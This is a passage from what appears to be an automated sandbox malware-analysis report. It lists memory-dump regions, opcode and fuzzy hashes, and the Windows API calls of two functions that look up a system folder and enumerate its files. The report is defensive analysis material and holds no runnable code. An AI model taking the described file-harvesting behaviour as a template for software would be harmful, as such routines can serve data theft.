                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: 9f6dbb89524ddfda0b606d6469fc65fab21e51edcf47697c0dfe960ff0c87163
                      • Instruction ID: 51f02f6eeeb9a1d836a9ac88752f38713f58e4cd73e6340ef319baf918044442
                      • Opcode Fuzzy Hash: 9f6dbb89524ddfda0b606d6469fc65fab21e51edcf47697c0dfe960ff0c87163
                      • Instruction Fuzzy Hash: BBF06D329006019BD724BBB958867CE33A0AF00B28F20C54FF40CA62D2CF6C59519F9E
                      Function 00474F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474F7A
                      • lstrcat.KERNEL32(?,00481070), ref: 00474F97
                      • lstrcat.KERNEL32(?,00E88990), ref: 00474FAB
                      • lstrcat.KERNEL32(?,00481074), ref: 00474FBD
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 0047492C
                        • Part of subcall function 00474910: FindFirstFileA.KERNEL32(?,?), ref: 00474943
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                        • Part of subcall function 00474910: FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                        • Part of subcall function 00474910: FindClose.KERNEL32(000000FF), ref: 00474B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: fca1d213eff81ed32e380a21bded36aeff28f31946e1903f3ed526f78222a61e
                      • Instruction ID: 1500679400db68c8dd672c45adda460ac52d12208f84ba754f6ec4efd93b8f0e
                      • Opcode Fuzzy Hash: fca1d213eff81ed32e380a21bded36aeff28f31946e1903f3ed526f78222a61e
                      • Instruction Fuzzy Hash: 3321B8B690020467C794FBB0DC46EED733DAB95300F00495FB65A92191EF78AAC9CF96